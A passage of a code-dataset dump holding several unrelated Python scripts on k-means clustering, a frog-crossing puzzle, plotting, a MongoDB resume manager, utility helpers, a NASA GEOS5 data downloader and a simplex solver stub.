\"__main__\":\n\tmain()\n","repo_name":"mkwon0/IOD-docker","sub_path":"test-system/test-swap/motiv/anal/anal-mysql.py","file_name":"anal-mysql.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3350143415","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 13 14:52:52 2019\r\n\r\n@author: yifan\r\n\"\"\"\r\n\r\nimport csv, time, random, math\r\n\r\nfrom mpi4py import MPI\r\n\r\nimport numpy\r\n\r\n\r\ndef eucl_distance(point_one, point_two):#计算两点欧式距离\r\n if(len(point_one) != len(point_two)):\r\n raise Exception(\"Error: non comparable points\")\r\n \r\n sum_diff=0\r\n for i in range(len(point_one)):\r\n diff = pow((float(point_one[i]) - float(point_two[i])), 2)\r\n sum_diff += diff\r\n final = math.sqrt(sum_diff)\r\n return final\r\n\r\n\r\ndef compare_center(initial_center, derived_center, dimensions, num_clusters, cutoff):\r\n if(len(initial_center) != len(derived_center)):\r\n raise Exception(\"Error: non comparable points\")\r\n flag = 0\r\n for i in range(num_clusters):\r\n diff = eucl_distance(initial_center[i], derived_center[i])\r\n if(diff < cutoff):\r\n flag += 1\r\n return flag\r\n\r\nnums=10*6\r\n\r\ndata=[[float((i+1000)/nums),float((2000+i)/nums)] for i in range(nums)]\r\n\r\n#data=[]\r\n#with open('kmeans_1.txt','r') as f:\r\n# for line in f:\r\n# tmps=line.strip('\\n').split()\r\n# if tmps!=[]:\r\n# data.append([float(tmp) for tmp in tmps])\r\n\r\ndef main():\r\n global data\r\n comm = MPI.COMM_WORLD\r\n rank = comm.Get_rank()\r\n size = comm.Get_size()\r\n \r\n dimensions=2\r\n num_clusters=size\r\n cutoff = 0.002\r\n compare_val = 0\r\n num_points = len(data)\r\n dimensions = len(data[0])\r\n initial = []\r\n for i in range(size):#initial包含所有data\r\n initial.append(data[i])\r\n start_time = time.time()\r\n while True:\t\r\n dist = []\r\n min_dist = numpy.zeros(num_points)\r\n for point in data:#dist记录每个rank到其他点的欧式距离\r\n dist.append(eucl_distance(initial[rank], point))\r\n temp_dist = numpy.array(dist)\r\n comm.Reduce(temp_dist, min_dist, op = MPI.MIN)#min_dist记录每个点到每个center最小距离\r\n comm.Barrier()\r\n if rank == 0:\r\n min_dist = min_dist.tolist()#numpy数据类型变list\r\n recv_min_dist = comm.bcast(min_dist, root = 0)\r\n comm.Barrier()\r\n cluster = []\r\n for i in range(len(recv_min_dist)):\r\n if recv_min_dist[i] == dist[i]:\r\n cluster.append(data[i])#表示该点到center的距离就是最小的\r\n center = []\r\n center_val = [0] * dimensions\r\n for i in cluster:\r\n for j in range(dimensions):\r\n center_val[j] += float(i[j])\r\n for j in range(dimensions):\r\n if(len(cluster) != 0):\r\n center_val[j] = center_val[j] / len(cluster)#即每个center_val的中心坐标\r\n center = comm.gather(center_val, root = 0)\r\n comm.Barrier()\r\n if rank == 0:\r\n compare_val = compare_center(initial, center, dimensions, size, cutoff)\r\n if compare_val == size:\r\n print('my rank is %d'% rank,center)\r\n print(\"Execution time %s seconds\" % (time.time() - start_time))\r\n break_val = comm.bcast(compare_val, root = 0)\r\n initial = comm.bcast(center, root = 0)\r\n comm.Barrier()\r\n if break_val == size:\r\n break\r\n MPI.Finalize()\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"yifan2/mpi4py-python","sub_path":"kemeans_mpi.py","file_name":"kemeans_mpi.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"19353095984","text":"\"\"\"\nriver = \"***** * * * * * *\" => crossable\n 011 2 3 4 4 3 4\n 011 2 3 4 4 3 3 4\n 01111 3 4 4 3 3 4\n\nriver = \"***** \" => not crossable\n 011 2 3\n\nInitial speed: 0\nInitial location: 0\n\nSpeed = {speed - 1, speed, speed + 1}\nLoc = loc + speed\n\"\"\"\n\n\nSPEED_OFFSETS = [-1, 0, 1]\n\n\ndef is_crossable(river, pos, speed):\n \"\"\"\n print is_crossable(\"** *\", 0, 0), \"should be True\"\n print is_crossable(\"***** *\", 0, 0), \"should be False\"\n\n :param river:\n :param pos:\n :param speed:\n :return:\n \"\"\"\n if river[pos] == \" \":\n return False\n\n for offset in SPEED_OFFSETS:\n if speed + offset <= 0:\n continue\n\n ns = speed + offset\n np = pos + ns\n if np >= len(river):\n return True\n if river[np] == \" \":\n continue\n if is_crossable(river, np, ns):\n return True\n\n return False\n\n\ndef is_crossable_optimized(river):\n # Cached attempts elements are two-tuples of position and speed that\n # have been attempted\n cached_attempts = set()\n\n return _is_crossable_helper(river, cached_attempts, 0, 0)\n\n\ndef _is_crossable_helper(river, cached_attempts, pos, speed):\n if (pos, speed) in cached_attempts:\n return False # been there, done that\n\n cached_attempts.add((pos, speed))\n\n if pos >= len(river):\n return True # crossed - yay!\n if river[pos] == \" \":\n return False # drowned :(\n\n for offset in SPEED_OFFSETS:\n new_speed = speed + offset\n if new_speed <= 0: # may only go forward\n continue\n\n if _is_crossable_helper(river, cached_attempts, pos + new_speed, new_speed):\n return True\n\n return False\n","repo_name":"vitaly-krugl/interview-prep","sub_path":"dp/frog_river/frog_river.py","file_name":"frog_river.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70146467047","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef kmeans(data, k, iter_time):\n centroids = data[np.random.choice(range(data.shape[0]), k, replace=False)]\n\n print('centroids test: ', centroids)\n\n labels = np.zeros(data.shape[0])\n \n for _ in range(iter_time):\n for i in range(data.shape[0]):\n distances = np.linalg.norm(data[i] - centroids, axis=1)\n labels[i] = np.argmin(distances)\n \n for j in range(k):\n centroids[j] = np.mean(data[labels == j], axis=0)\n \n return centroids, labels\n\n#data = pd.read_csv('./k-means/test0.csv')\ndata = np.genfromtxt('./k-means/test0.csv', delimiter=',', skip_header=True)\n\nprint('data shape: ', data.shape)\n\nk = 3\n\ncentroids, labels = kmeans(data, k , data.shape[0])\n\n#print(data[:,0])\n#print(data[:,1])\nplt.scatter(data[:, 0], data[:, 1], c=labels)\nplt.scatter(centroids[:, 0], centroids[:, 1], c='red', marker='X')\nplt.title('K-means testing')\nplt.show()\n","repo_name":"d940909492/machine-learning-practice","sub_path":"Kmeans/kmeans_without_sklearn.py","file_name":"kmeans_without_sklearn.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24312417693","text":"NAME = '2_plot_decision_tree' ## Name of the notebook goes here (without the file extension!)\nPROJECT = 'Decision Tree Classifier'\nPYTHON_VERSION = '3.6.7'\n\n## Imports\nimport os\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n## Set working directory \nworkdir = '/home/filip/Git/'+PROJECT\nos.chdir(workdir)\n\n## Set up pipeline folder if missing \nif os.path.exists(os.path.join('empirical', '2_pipeline')):\n pipeline = os.path.join('empirical', '2_pipeline', NAME)\nelse:\n pipeline = os.path.join('2_pipeline', NAME)\n \nif not os.path.exists(pipeline):\n os.makedirs(pipeline)\n for folder in ['out', 'store', 'tmp']:\n os.makedirs(os.path.join(pipeline, folder))\n\n## Code\nDTC = pickle.load(open(workdir+'/empirical/2_pipeline/1_get_tree/DTC.obj', 'rb'))\n\nvlines = pickle.load(open(workdir+'/empirical/2_pipeline/1_get_tree/vlines.obj', 'rb'))\nhlines = pickle.load(open(workdir+'/empirical/2_pipeline/1_get_tree/hlines.obj', 'rb'))\n\ndims = pickle.load(open(workdir+'/empirical/2_pipeline/1_get_tree/dims.obj', 'rb'))\n\nx_scale = np.linspace(dims[0][0], dims[0][1], 100)\ny_scale = np.linspace(dims[1][0], dims[1][1], 100)\n\ny_ticks = ['{0:.2f}'.format(y) for y in np.linspace(dims[0][0], dims[0][1], 6)]\nx_ticks = ['{0:.2f}'.format(x) for x in np.linspace(dims[1][0], dims[1][1], 6)]\n\naxis_labels = (pd\n .read_csv(workdir+'/empirical/2_pipeline/0_feature_candidates/features.csv', nrows=0)\n .columns #extracting feature names\n .tolist()\n )[1:3]\n\nmesh = np.meshgrid(x_scale, y_scale)\nmesh = list(zip(mesh[0].flatten(), mesh[1].flatten()))\n\npredicted = DTC.predict(mesh)\npredicted = predicted.reshape(100, 100)\n\n#rescale horizontal and vertical lines to match imshow dimensions (100x100)\ndef rescale(value, scale):\n _ = []\n low = float(min(scale))\n high = float(max(scale))\n try:\n for v in value:\n _.append(100*(float(v)-low)/(high-low))\n except:\n return None\n return _\n\n#plot figure\nplt.imshow(predicted)\nfor v in rescale(vlines, dims[0]):\n plt.axvline(v, color='r', linestyle='--')\nfor h in rescale(hlines, dims[1]):\n plt.axhline(h, color='r', linestyle='--')\n#remove ticks and labels\nplt.xlabel(axis_labels[1])\nplt.ylabel(axis_labels[0])\nplt.yticks(ticks=[0,20,40,60,80,100], labels=y_ticks[-1::-1])\nplt.xticks(ticks=[0,20,40,60,80,100], labels=x_ticks)\n\nplt.savefig(workdir+'/empirical/3_output/results/plot.png')\n","repo_name":"93fk/Decision-Tree-classifier","sub_path":"empirical/1_code/2_plot_decision_tree.py","file_name":"2_plot_decision_tree.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4529907588","text":"# 修改 rw_visual.py ,将其中的 plt.scatter() 替换为 plt.plot() 。\n# 为模拟花粉在水滴表面的运动路径,向 plt.plot() 传递 rw.x_values和 rw.y_values ,\n# 并指定实参值 linewidth 。使用 5000 个点而不是 50 000 个点。\n\nimport matplotlib.pyplot as plt\n\n# 若不在同一目录,python查找不到,必须进行查找路径的设置,将模块所在的文件夹加入系统查找路径\nimport sys\nsys.path.append('..')\nfrom random_walk import RandomWalk\n\n# 只要程序处于活动状态,就不断地模���随机漫步\nwhile True:\n\n # 创建一个RandomWalk 实例,并将其包含的点都绘制出来\n rw = RandomWalk(5000) # 增加点数,初始5000\n rw.fill_walk()\n\n # 设置绘图窗口的尺寸\n '''\n 函数 figure() 用于指定图表的宽度、高度、分辨率和背景色。\n 你需要给形参 figsize 指定一个元组,向 matplotlib 指出绘图窗口的尺寸,单位为英寸。\n Python 假定屏幕分辨率为 80 像素 / 英寸,如果上述代码指定的图表尺寸不合适,可根据需要调整其中的数字。\n 如果你知道自己的系统的分辨率,可使用形参 dpi 向 figure() 传递该分辨率,以有效地利用可用的屏幕空间,如下所示:\n plt.figure(dpi=128, figsize=(10,6)) \n '''\n plt.figure(figsize = (6,4))\n\n '''\n 我们将使用颜色映射来指出漫步中各点的先后顺序,并删除每个点的黑色轮廓,让它们的颜色更明显。\n 为根据漫步中各点的先后顺序进行着色,我们传递参数 c ,并将其设置为一个列表,\n 其中包含各点的先后顺序。由于这些点是按顺序绘制的,因此给参数 c 指定的列表只需包含数字 1~5000\n '''\n point_numbers = list(range(rw.num_points))\n # zorder 层级,较高的放在较低的顶层\n plt.plot(rw.x_values, rw.y_values, linewidth=1, zorder=1) # 增加点数之后,调小每个点的大小\n\n # 隐藏坐标轴\n plt.axes().get_xaxis().set_visible(False)\n plt.axes().get_yaxis().set_visible(False)\n\n # 突出起点和终点\n plt.scatter(0, 0, c='green', edgecolors='none', s=100)\n plt.scatter(rw.x_values[-1], rw.y_values[-1], c='red',\n edgecolors='none', s=100, zorder=2)\n\n plt.show()\n\n keep_running = input(\"Make another walk? (y/n) :\")\n if keep_running == \"n\":\n break","repo_name":"pangfeiyo/PythonLearn","sub_path":"Python:从入门到实践/从入门到实践代码/第15章 生成数据/15.3 随机漫步/动动手/15-3 分子运动.py","file_name":"15-3 分子运动.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20375809819","text":"#coding=utf-8\nimport pymongo\nconn=pymongo.MongoClient(host='127.0.0.1',port=27017)\ndb=conn.jianli\n\ndef find1():\n\ttcho=input('''\n\t查询所有文档请按a\n\t根据名字查询文档请按b\n\t根据电话查询文档请按c\n\t根据经历查询文档请按d\n\t返回上一层按q\n\t\t\t\t''') \n\tif tcho=='a':\n\t\tdata=db.jianli.find({},{'_id':0})\n\t\tfor i in data:\n\t\t\tprint('名字:'+i['name']+' 电话:'+i['num']+' 经历:'+i['exp'])\n\telif tcho=='b':\n\t\tename=input('请输入名字: ')\n\t\tdata=db.jianli.find({'name':ename},{'_id':0})\n\t\tfor i in data:\n\t\t\tprint('名字:'+i['name']+' 电话:'+i['num']+' 经历:'+i['exp'])\n\telif tcho=='c':\n\t\tenum=input('请输入电话: ')\n\t\tdata=db.jianli.find({'num':enum},{'_id':0})\n\t\tfor i in data:\n\t\t\tprint('名字:'+i['name']+' 电话:'+i['num']+' 经历:'+i['exp'])\n\telif tcho=='d':\n\t\teexp=input('请输入经历: ')\n\t\tdata=db.jianli.find({'exp':eexp},{'_id':0})\n\t\tfor i in data:\n\t\t\tprint('名字:'+i['name']+' 电话:'+i['num']+' 经历:'+i['exp'])\n\telif tcho=='q':\n\t\tpass\n\telse:\n\t\tprint('输入有误')\n\ndef del1():\n\ttcho=input('''\n\t根据名字删除文档请按a\n\t根据电话删除文档请按b\n\t根据经历删除文档请按c\n\t返回上一层按q\n\t\t\t\t''')\n\tif tcho=='a':\n\t\twhile 1:\n\t\t\tename=input('请输入名字: ')\n\t\t\tdata=db.jianli.find({'name':ename})\n\t\t\tif data.count()==0:\n\t\t\t\tt=input('''\n\t名字不存在\n\t请重新输入\n\t任意键继续\n\tq键退出\n\t\t\t\t\t''')\n\t\t\t\tif t=='q':\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\n\t\t\telse:\n\t\t\t\tdb.jianli.remove({'name':ename})\n\t\t\t\tprint('删除成功')\n\t\t\t\tbreak\n\telif tcho=='b':\n\t\twhile 1:\n\t\t\tenum=input('请输入号码: ')\n\t\t\tdata=db.jianli.find({'num':enum})\n\t\t\tif data.count()==0:\n\t\t\t\tt=input('''\n\t号码不存在\n\t请重新输入\n\t任意键继续\n\tq键退出\n\t\t\t\t''')\n\t\t\t\tif t=='q':\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdb.jianli.remove({'num':enum})\n\t\t\t\tprint('删除成功')\n\telif tcho=='c':\n\t\twhile 1:\n\t\t\teexp=input('请输入经历: ')\n\t\t\tdata=db.jianli.find({'exp':eexp})\n\t\t\tif data.count()==0:\n\t\t\t\tt=input('''\n\t经历不存在\n\t请重新输入\n\t任意键继续\n\tq键退出\n\t\t\t\t''')\n\t\t\t\tif t=='q':\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdb.jianli.remove({'exp':eexp})\n\t\t\t\tprint('删除成功')\n\telif tcho=='q':\n\t\tpass\n\telse:\n\t\tprint('输入有误')\ndef update1():\n\twhile 1:\n\t\tename=input('请输入名字: ')\n\t\tdata=db.jianli.find({'name':ename})\n\t\tif data.count()==0:\n\t\t\tt=input('''\n\t名字不存在\n\t请重新输入\n\t任意键继续\n\tq键退出\n\t\t\t\t''')\n\t\t\tif t=='q':\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tcontinue\n\t\telse:\n\t\t\tenum=input('请输入修改电话: ')\n\t\t\teexp=input('请输入修改经历: ')\n\t\t\tdb.jianli.update({'name':ename},{'$set':{'num':enum}})\n\t\t\tdb.jianli.update({'name':ename},{'$set':{'exp':eexp}})\n\t\t\tprint('修改成功')\n\t\t\tbreak\n\ndef ins1():\n\twhile 1:\n\t\tename=input('请输入名字: ')\n\t\tenum=input('请输入号码: ')\n\t\teexp=input('请输入经历: ')\n\t\ttcho2=input('确认信息请按yes\\n任意键重输\\nq键退出')\n\t\tif tcho2=='yes':\n\t\t\tdb.jianli.insert({'name':ename,'num':enum,'exp':eexp})\n\t\t\tprint('增加成功')\n\t\t\tbreak\n\t\telif tcho2=='q':\n\t\t\tbreak\n\t\telse:\n\t\t\tcontinue\n\nwhile 1:\n\n\ttype1=input('''\n\t查询请按1\n\t删除请按2\n\t增加请按3\n\t修改请按4\n\t退出请按5\n\t\t\t\t''')\n\n\tif type1=='1':\n\t\tfind1()\n\telif type1=='2':\n\t\tdel1()\n\telif type1=='3':\n\t\tins1()\n\telif type1=='4':\n\t\tupdate1()\n\telif type1=='5':\n\t\tbreak\n\telse:\n\t\tprint('输入有误')\t\n\n\n","repo_name":"aallenchen2018/login-sys","sub_path":"林永金.py","file_name":"林永金.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72706004009","text":"from __future__ import print_function, unicode_literals, absolute_import, division\nfrom six.moves import range, zip, map, reduce, filter\n# from functools import reduce\nfrom sortedcollections import SortedDict\nimport collections\nfrom collections import Counter\nfrom tabulate import tabulate\nfrom math import floor, ceil\nfrom pathlib import Path\nfrom glob import glob\nimport re\n\n\nflatten = lambda l: [item for sublist in l for item in sublist]\n\ndef factors(n):\n \"from https://stackoverflow.com/questions/6800193/what-is-the-most-efficient-way-of-finding-all-the-factors-of-a-number-in-python\"\n return set(reduce(list.__add__,\n ([i, n//i] for i in range(1, int(pow(n, 0.5) + 1)) if n % i == 0)))\n\ndef pfactors(n): \n \"\"\"\n Finds the prime factors of 'n'\n https://stackoverflow.com/questions/14550794/python-integer-factorization-into-primes\n \"\"\" \n from math import sqrt \n pFact, limit, check, num = [], int(sqrt(n)) + 1, 2, n \n if n == 1: return [1] \n for check in range(2, limit): \n while num % check == 0: \n pFact.append(check) \n num /= check \n if num > 1:\n pFact.append(num)\n return pFact\n\ndef rowscols(n,cols=8):\n \"divide n things up into rows*columns things\"\n rows,xt = divmod(n,cols)\n if rows == 0:\n rows,cols = 1,xt\n return rows, cols\n\ndef timewindow(lst, t, l):\n \"window of fixed length l into list lst. try to center around t.\"\n assert l <= len(lst)\n if t < l//2: t=l//2\n if t >= len(lst) - l//2: t=len(lst) - ceil(l/2)\n return lst[t-l//2:t+ceil(l/2)]\n\ndef print_sorted_counter(l):\n s = SortedDict(Counter(l))\n print(tabulate([s.keys(), s.values()]))\n\ndef sorted_alphanum( l ):\n \"\"\" Sort the given iterable in the way that humans expect.\n taken from https://stackoverflow.com/questions/2669059/how-to-sort-alpha-numeric-set-in-python\n \"\"\" \n convert = lambda text: int(text) if text.isdigit() else text \n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \n return sorted(l, key = alphanum_key)\n\ndef path_base_ext(fname):\n directory, base = os.path.split(fname)\n base, ext = os.path.splitext(base)\n return directory, base, ext\n\ndef pprint_list_of_dict(lod, keys=None):\n if not keys:\n keys = lod[0].keys()\n table = [keys]\n table = table + [d.values() for d in lod]\n print(tabulate(table))\n\ndef timing(f):\n @wraps(f)\n def wrap(*args, **kw):\n ts = time()\n result = f(*args, **kw)\n te = time()\n print('func:%r args:[%r, %r] took: %2.4f sec' % (f.__name__, args, kw, te-ts))\n return result\n return wrap\n\ndef do(iter):\n return [x for x in iter]\n\ndef groupbyn(list0, n):\n return [list0[i:i+n] for i in range(0, len(list0), n)]\n\n## uwe's stuff\n\ndef _raise(e):\n raise e\n\n# https://docs.python.org/3/library/itertools.html#itertools-recipes\ndef consume(iterator):\n collections.deque(iterator, maxlen=0)\n\ndef compose(*funcs):\n return lambda x: reduce(lambda f,g: g(f), funcs, x)\n\ndef pipeline(*steps):\n return reduce(lambda f,g: g(f), steps)\n\n\n## print type hierarchy for arbitrary objects\n\n# def printtypes(obj):\n# if hasattr(obj, '__len__'):\n# print(type(obj))\n# for x in obj:\n# printtypes(x)\n\ndef parse_python_script_comments(filename):\n lines = open(filename,'r').readlines()\n block_indices = [i for i,line in enumerate(lines) if '\"\"\"' in line]\n block_indices = groupbyn(block_indices,2)\n textlist = []\n for bi in block_indices:\n varname = lines[bi[0]][:-6] # remove last bit from eg (info = \"\"\")\n vartext = ''.join(lines[bi[0]+1:bi[1]])\n textlist.append([varname, vartext])\n return textlist\n\ndef glob_and_parse_filename(globname, n=3):\n try:\n lastfile = Path(sorted(glob(globname))[-1])\n lastfile_number = int(lastfile.stem[-n:])\n return lastfile_number\n except IndexError as e:\n print(e)\n return None\n\n\nimport inspect\nimport difflib\nimport collections\nfrom collections import Sequence\n\ntry:\n from colorama import Fore, Back, Style, init\n init()\nexcept ImportError: # fallback so that the imported classes always exist\n class ColorFallback():\n __getattr__ = lambda self, name: '' \n Fore = Back = Style = ColorFallback()\n\ndef diff_func_source(f1,f2):\n \"\"\"\n works with functions, classes or entire modules\n prints colored diff output to terminal\n makes it easier to put large, similar functions into same file/module\n \"\"\"\n def color_diff(diff):\n for line in diff:\n if line.startswith('+'):\n yield Fore.GREEN + line + Fore.RESET\n elif line.startswith('-'):\n yield Fore.RED + line + Fore.RESET\n elif line.startswith('^'):\n yield Fore.BLUE + line + Fore.RESET\n else:\n yield line\n\n lines1 = inspect.getsourcelines(f1)\n lines2 = inspect.getsourcelines(f2)\n diff = color_diff([line for line in difflib.ndiff(lines1[0],lines2[0])])\n for l in diff: print(l,end='')\n\ndef flatten(l):\n for el in l:\n if isinstance(el, collections.Iterable) and not isinstance(el, (str, bytes)):\n yield from flatten(el)\n else:\n yield el\n\ndef recursive_map(func, seq):\n def loop(func,seq):\n if isinstance(seq, (list,set,tuple)):\n for item in seq:\n yield type(item)(loop(func,item))\n elif isinstance(seq, dict):\n for k,v in seq.items():\n yield type(v)(loop(func,v))\n else:\n yield func(item)\n return type(seq)(loop(func,seq))\n\nfrom collections import Collection, Mapping\n\ndef recursive_map2(func, data):\n apply = lambda x: recursive_map2(func, x)\n if isinstance(data, Mapping):\n return type(data)({k: apply(v) for k, v in data.items()})\n elif isinstance(data, Collection) and not isinstance(data, str):\n return type(data)(apply(v) for v in data)\n else:\n return func(data)\n\n# sigds are the significance digits\n# inputs are lists of names, values and uncertainties respectively\ndef _print_fres(names, vals, uncs, sigds = 2, rfmt = 'pm', ws = False):\n try:\n if all([str(u).lower() not in 'inf' for u in uncs]):\n sigs = [\n (re.search('[1-9]', str(u)).start()-2 \\\n if re.match('0\\.', str(u)) \\\n else -re.search('\\.', str(float(u))).start())+sigds \\\n for u in uncs\n ]\n # significant digits rule in uncertainty\n else:\n print('Warning: infinity in uncertainty values')\n sigs = [sigds] * len(uncs)\n except TypeError: #NaN or None\n raise TypeError('Error: odd uncertainty values')\n\n rfmt = rfmt.lower()\n # this can be done better/prettier I think\n if rfmt in ['fancy', 'pms']: # pms stands for pmsign\n res_str = '{{0}} = {{1:{ws}{nfmt}}} ± {{2:{ws}{nfmt}}}'\n elif rfmt in ['basic', 'pm', 'ascii']:\n res_str = '{{0}} = {{1:{ws}{nfmt}}}+/-{{2:{ws}{nfmt}}}'\n elif rfmt in ['tex', 'latex']:\n res_str = '${{0}} = {{1:{ws}{nfmt}}} \\\\pm {{2:{ws}{nfmt}}}$'\n elif rfmt in ['s1', 'short1']:\n res_str = '{{0}} = {{1:{ws}{nfmt}}} ± {{2:{ws}{nfmt}}}'\n # not yet supported. to do: shorthand notation\n elif rfmt in ['s2', 'short2']:\n res_str = '{{0}} = {{1:{ws}{nfmt}}}({{2:{ws}{nfmt}}})'\n else:\n raise KeyError('rfmt value is invalid')\n\n for i in range(len(vals)):\n try:\n print((res_str.format(\n nfmt = '1e' if uncs[i] >= 1000 or uncs[i] <= 0.001 \\\n # 1 decimal exponent notation for big/small numbers\n else (\n 'd' if sigs[i] <= 0 \\\n # integer if uncertainty >= 10\n else '.{}f'.format(sigs[i])),\n ws = ' ' if ws in [True, ' '] else ''\n )\n ).format(\n names[i],\n round(vals[i], sigs[i]),\n round(uncs[i], sigs[i])\n # round to allow non-decimal significances\n )\n )\n\n except (TypeError, ValueError, OverflowError) as e:\n print('{} value is invalid'.format(uncs[i]))\n print(e)\n continue\n # to do: a repr method to get numbers well represented\n # instead of this whole mess","repo_name":"mpicbg-csbd/detsegtra","sub_path":"segtools/python_utils.py","file_name":"python_utils.py","file_ext":"py","file_size_in_byte":8145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"31589497111","text":"from functools import reduce\nfrom typing import Generator, List\n\n\ndef zip_generators(generator_list: List[Generator]):\n \"\"\"\n `generator_list` 들을 모아, 단일 Generator를 생성합니다.\n\n Parameters\n ----------\n generator_list : List[Generator]\n [description]\n\n Examples\n --------\n >>> def sample_generator(f=0, t=10):\n ... for i in range(f, t):\n ... yield i\n \n >>> sample_generator1 = sample_generator(0, 10)\n >>> sample_generator2 = sample_generator(5, 15)\n >>> sample_generator3 = sample_generator(16, 29)\n >>> sample_generator4 = sample_generator(30, 66)\n >>> sample_generators: List[Generator] = [sample_generator1, sample_generator2, sample_generator3, sample_generator4]\n >>> list_generator = map(list, zip_generators(sample_generators))\n >>> next(list_generator)\n [0, 5, 16, 30]\n >>> next(list_generator)\n [1, 6, 17, 31]\n \"\"\"\n assert len(generator_list) != 0, \"List is empty.\"\n\n def _tuple_reducer(a, b):\n for _element in zip(a, b):\n if isinstance(_element[0], tuple):\n yield _element[0] + (_element[1],)\n else:\n yield (_element[0],) + (_element[1],)\n\n if len(generator_list) == 1:\n return map(lambda el: (el,), generator_list[0])\n else:\n return reduce(lambda a, b: _tuple_reducer(a, b), generator_list)\n","repo_name":"tenkeyless/image-keras","sub_path":"image_keras/supports/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33286187711","text":"# 삼성 오후 1번 문제\n# 구현\n\nn, m = map(int, input().split())\n\n\narr = [list(map(int, input().split())) for _ in range(n)]\nmoves = []\nfor i in range(m):\n tmp = list(map(int, input().split()))\n moves.append([tmp[0] - 1, tmp[1]])\n\nclouds = [[n-2, 0], [n-2, 1], [n-1, 0], [n-1, 1]]\n\ndx = [0, -1, -1, -1, 0, 1, 1, 1]\ndy = [-1, -1, 0, 1, 1, 1, 0, -1]\nfor i in range(m):\n # step 1.\n # 이동\n move = moves[i]\n next_clouds = []\n for cloud in clouds:\n x = cloud[0]\n y = cloud[1]\n d = move[0]\n s = move[1]\n nx = (n + x + dx[d] * s) % n\n ny = (n + y + dy[d] * s) % n\n next_clouds.append([nx, ny])\n\n # step 2.\n visited = [[False]* n for _ in range(n)]\n for cloud in next_clouds:\n x = cloud[0]\n y = cloud[1]\n arr[x][y] += 1\n visited[x][y] = True\n \n # step 3\n clouds = []\n\n # step 4\n cx = [-1, -1, 1, 1]\n cy = [-1, 1, -1, 1]\n for cloud in next_clouds:\n x = cloud[0]\n y = cloud[1]\n count = 0\n for i in range(4):\n nx = x + cx[i]\n ny = y + cy[i]\n\n if 0 <= nx < n and 0<= ny < n and arr[nx][ny] >= 1:\n count += 1\n\n arr[x][y] += count\n \n # step 5\n\n for i in range(n):\n for j in range(n):\n if arr[i][j] >= 2 and visited[i][j] == False:\n arr[i][j] -= 2\n clouds.append([i, j])\n\nans = 0\nfor i in range(n):\n ans += sum(arr[i])\n\n\nprint(ans)\n","repo_name":"chulhee23/today_ps","sub_path":"BOJ/20000-24999/21610.py","file_name":"21610.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"40804632801","text":"from ModelBase import ModelBase\nfrom imports import *\n\n\nclass Model(ModelBase):\n def __init__(self, model, dtg):\n super().__init__(model, dtg)\n\n self.field = \"aod\"\n self.file_out = 'aod_geos5.nc'\n\n def download(self):\n dtg = lt.newdtg( self.dtg, -24 )\n \n #_Setup download URL\n url = 'https://opendap.nccs.nasa.gov/dods/GEOS-5/'\\\n \t+ 'fp/0.25_deg/fcast/inst1_2d_hwl_Nx'\n dap_file = 'inst1_2d_hwl_Nx.' + dtg[:8] + '_'+dtg[8:] \n \t\t# +'z', removed from url June 6th\n\n speciesDict = self.mod_dict['GEOS5']['specn']\n #_Get GSFC name for species and create ncdf variable\n\n out = Dataset( self.file_out, 'w', format='NETCDF3_CLASSIC' )\n nt, ny, nx = (0,0,0)\n ncdf = Dataset( url + '/' + dap_file )\n\n for idx, k in enumerate(speciesDict.keys()):\n spec = speciesDict[k]\n\n logging.info(url + '/' + dap_file + \"?\" + spec)\n\n if idx == 0:\n nt, ny, nx = ncdf[spec].shape\n out.createDimension( 'lon', nx )\n out.createDimension( 'lat', ny )\n out.createDimension( 'time', nt )\n\n v = out.createVariable( k, 'f4', ('time','lat','lon') )\n print(ncdf[spec])\n for t in range(0, len(ncdf.variables['time'][:])):\n v[t]= ncdf[spec][t]\n\n out.close()\n #print(ncdf)\n\n # time = float(ncdf.variables['time'][0])\n # atime = datetime.fromtimestamp(time)\n # dtg_geos = datetime.strptime(time,\"%Y%m%d%H\")\n # print(dtg_geos)\n # file = atime + '_aod_geos5.nc' \n \n #_If final file exist, skip\n\n #_Attempt to join individual variable files \n #utils.geos5_join( self.dtg, species, self.file_out)\n \t\n","repo_name":"jroetman/backup","sub_path":"netcdf/models/GEOS5.py","file_name":"GEOS5.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34871418198","text":"import copy\n\nfrom simplex.utils import minimizing_index\n\n\ndef initialize_simplex(A, b, c):\n rows = 